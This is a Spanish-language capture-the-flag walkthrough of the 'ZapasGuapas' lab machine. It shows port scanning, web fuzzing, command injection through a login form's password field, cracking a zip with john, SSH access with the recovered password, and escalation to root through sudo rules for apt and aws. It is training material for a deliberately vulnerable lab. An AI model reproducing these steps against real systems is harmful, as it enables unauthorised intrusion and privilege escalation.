Title here
Summary here
ZapasGuapas
Enumeration
Vamos a empezar con un escaneo nmap:
┌──(pylon㉿kali)-[~/…/pylon/THL/Zapasguapas/nmap]
└─$ nmap -p- --open --min-rate=5000 -n -Pn -vvv 192.168.231.131
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-17 13:53 CEST
Initiating ARP Ping Scan at 13:53
Scanning 192.168.231.131 [1 port]
Completed ARP Ping Scan at 13:53, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:53
Scanning 192.168.231.131 [65535 ports]
Discovered open port 22/tcp on 192.168.231.131
Discovered open port 80/tcp on 192.168.231.131
Completed SYN Stealth Scan at 13:53, 1.06s elapsed (65535 total ports)
Nmap scan report for 192.168.231.131
Host is up, received arp-response (0.000047s latency).
Scanned at 2025-07-17 13:53:30 CEST for 1s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 00:0C:29:C6:42:17 (VMware)
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.27 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)Vamos a realizar un segundo escaneo para determinar la versión del servicio de cada y lanzar algunos scripts básicos de reconocimiento:
┌──(pylon㉿kali)-[~/…/pylon/THL/Zapasguapas/nmap]
└─$ nmap -p22,80 -sCV 192.168.231.131
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-17 13:54 CEST
Nmap scan report for 192.168.231.131
Host is up (0.00018s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 7e:42:d0:d4:c9:36:f4:f8:e6:77:c2:c6:7e:25:dc:ff (ECDSA)
|_ 256 6f:a0:50:44:9f:a2:fb:99:40:f3:90:af:56:cc:34:e3 (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Zapasguapas
MAC Address: 00:0C:29:C6:42:17 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.51 secondsBien vamos a ver la aplicación web:
Si vamos probando cosas en la web vemos que no tiene muchas funcionalidades, así que vamos a realizar fuzzing:
┌──(pylon㉿kali)-[~/…/pylon/THL/Zapasguapas/nmap] 13:56:49 [7/7]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://192.168.231.131/FUZZ" -e .php,.html,.js,.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.231.131/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .html .js .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
contact.html [Status: 200, Size: 7694, Words: 2174, Lines: 158, Duration: 1ms]
about.html [Status: 200, Size: 8764, Words: 2769, Lines: 178, Duration: 1ms]
login.html [Status: 200, Size: 2090, Words: 531, Lines: 50, Duration: 2ms]
images [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 60ms]
bin [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 1ms]
css [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 0ms]
index.html [Status: 200, Size: 14085, Words: 4801, Lines: 274, Duration: 169ms]
lib [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 1ms]
js [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 0ms]
javascript [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 2ms]
include [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 0ms]
testimonial.html [Status: 200, Size: 8587, Words: 2719, Lines: 173, Duration: 3ms]
nike.php [Status: 200, Size: 2362, Words: 607, Lines: 78, Duration: 1ms]Vemos que hay un login.html vamos a ver como es:
Vamos a probar credenciales típicas:
admin / adminadministrator / admin123
Pero nada funciona, vamos a ver como se tramita nuestra data por detrás con BurpSuite, para ello interceptaremos la consulta de inicio de sesión:
Shell as www-data
Vamos a enviarlo al Repeater. Si nos fijamos podremos ver que esta usando el archivo run_command.php así que seguramente este usando uno de los inputs para ejecutar X acción vamos a probar con el parámetro username:
Nada, vamos a probar con el parámetro password:
Tenemos ejecución de código!! Vamos a enviarnos una reverse shell:
Shell as pronike
Si leemos el /etc/passwd podremos ver 4 usuarios:
www-data@zapasguapas:/var/www/tienda$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
test:x:1000:1000:test,,,:/home/test:/bin/bash
proadidas:x:1001:1001::/home/proadidas:/bin/bash
pronike:x:1002:1002::/home/pronike:/bin/bashVamos a ver ambos home, en el home del usuario pronike podremos ver un archivo llamado nota.txt:
www-data@zapasguapas:/home$ ls pronike
nota.txtVamos a leerlo:
www-data@zapasguapas:/home$ cat pronike/nota.txt
Creo que proadidas esta detras del robo de mi contraseñaVemos que el usuario comenta que proadidas le robo la contraseña, así que vamos a ir a su home para ver si las encontramos:
www-data@zapasguapas:/home$ ls -la proadidas
total 32
drwxr-xr-x 3 proadidas proadidas 4096 Jul 17 15:52 .
drwxr-xr-x 4 root root 4096 Apr 23 2024 ..
lrwxrwxrwx 1 root root 9 Apr 23 2024 .bash_history -> /dev/null
-rw-r--r-- 1 proadidas proadidas 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 proadidas proadidas 3526 Apr 23 2023 .bashrc
-rw------- 1 proadidas proadidas 38 Jul 17 15:52 .lesshst
drwxr-xr-x 3 proadidas proadidas 4096 Apr 23 2024 .local
-rw-r--r-- 1 proadidas proadidas 807 Apr 23 2023 .profile
-r-------- 1 root root 33 Apr 17 2024 user.txtNo vemos nada interesante… Buscando por directorios encontré lo siguiente en /opt/:
www-data@zapasguapas:/opt$ ls
importante.zipVamos a abrir un servidor en python3 y descargarnoslo:
www-data@zapasguapas:/opt$ python3 -m http.server 8082┌──(pylon㉿kali)-[~/…/pylon/THL/Zapasguapas/content]
└─$ wget 192.168.231.131:8082/importante.zip
Prepended http:// to '192.168.231.131:8082/importante.zip'
--2025-07-17 14:09:05-- http://192.168.231.131:8082/importante.zip
Connecting to 192.168.231.131:8082... connected.
HTTP request sent, awaiting response... 200 OK
Length: 266 [application/zip]
Saving to: ‘importante.zip’
importante.zip 100%[=================================================================================================>] 266 --.-KB/s in 0s
2025-07-17 14:09:05 (60.8 MB/s) - ‘importante.zip’ saved [266/266]Bien vamos a intentar descomprimirlo:
┌──(pylon㉿kali)-[~/…/pylon/THL/Zapasguapas/content]
└─$ unzip importante.zip
Archive: importante.zip
[importante.zip] password.txt password:Nos piden credenciales, así que vamos a crackearlo. Para ello sacaremos su hash con zip2john:
┌──(pylon㉿kali)-[~/…/pylon/THL/Zapasguapas/content]
└─$ zip2john importante.zip > hash
ver 2.0 efh 5455 efh 7875 importante.zip/password.txt PKZIP Encr: TS_chk, cmplen=76, decmplen=71, crc=9CB8F6B5 ts=4C4E cs=4c4e type=8Ahora vamos a crackearlo con el diccionario rockyou.txt con john indicandole el formato PKZIP:
┌──(pylon㉿kali)-[~/…/pylon/THL/Zapasguapas/content]
└─$ john -w=/usr/share/wordlists/rockyou.txt hash --format=PKZIP
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hotstuff (importante.zip/password.txt)
1g 0:00:00:00 DONE (2025-07-17 14:11) 100.0g/s 819200p/s 819200c/s 819200C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Ahora vamos a descomprimirlo:
┌──(pylon㉿kali)-[~/…/pylon/THL/Zapasguapas/content]
└─$ unzip importante.zip
Archive: importante.zip
[importante.zip] password.txt password:
inflating: password.txtVemos el archivo password.txt vamos a ver su contenido:
He conseguido la contraseña de pronike. Adidas FOREVER!!!!
pronike11Bien tenemos las credenciales del usuario pronike vamos acceder por SSH:
┌──(pylon㉿kali)-[~/…/pylon/THL/Zapasguapas/content]
└─$ ssh pronike@192.168.231.131
pronike@192.168.231.131's password:
Linux zapasguapas 6.1.0-20-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.85-1 (2024-04-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 17 15:45:49 2025 from 192.168.231.128
pronike@zapasguapas:~$Bien!! Estamos como el usuario pronike
Shell as proadidas
Vamos a ver si tiene permisos SUDOERS este usuario:
pronike@zapasguapas:~$ sudo -l
Matching Defaults entries for pronike on zapasguapas:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User pronike may run the following commands on zapasguapas:
(proadidas) NOPASSWD: /usr/bin/aptBien vamos a abusar de el de la siguiente manera:
sudo -u proadidas /usr/bin/apt changelog apt
!/bin/bashpronike@zapasguapas:~$ sudo -u proadidas /usr/bin/apt changelog apt
Des:1 https://metadata.ftp-master.debian.org apt 2.6.1 Changelog [505 kB]
Descargados 505 kB en 1s (564 kB/s)
proadidas@zapasguapas:/home/pronike$Bien!! Ya somos el usuario proadidas.
Shell as root
Volvamos a ver si tiene permisos SUDOERS:
proadidas@zapasguapas:/home/pronike$ sudo -l
Matching Defaults entries for proadidas on zapasguapas:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User proadidas may run the following commands on zapasguapas:
(proadidas) NOPASSWD: /usr/bin/apt
(root) NOPASSWD: /usr/bin/awsVemos que puede usar el binario aws como root sin necesidad de contraseña, si lo buscamos por GTFObins nos comenta lo siguiente:
Bien vamos a abusar de el:
proadidas@zapasguapas:/home/pronike$ sudo aws help
root@zapasguapas:/home/pronike# whoami
root
root@zapasguapas:/home/pronike#root! ;)
Reseña
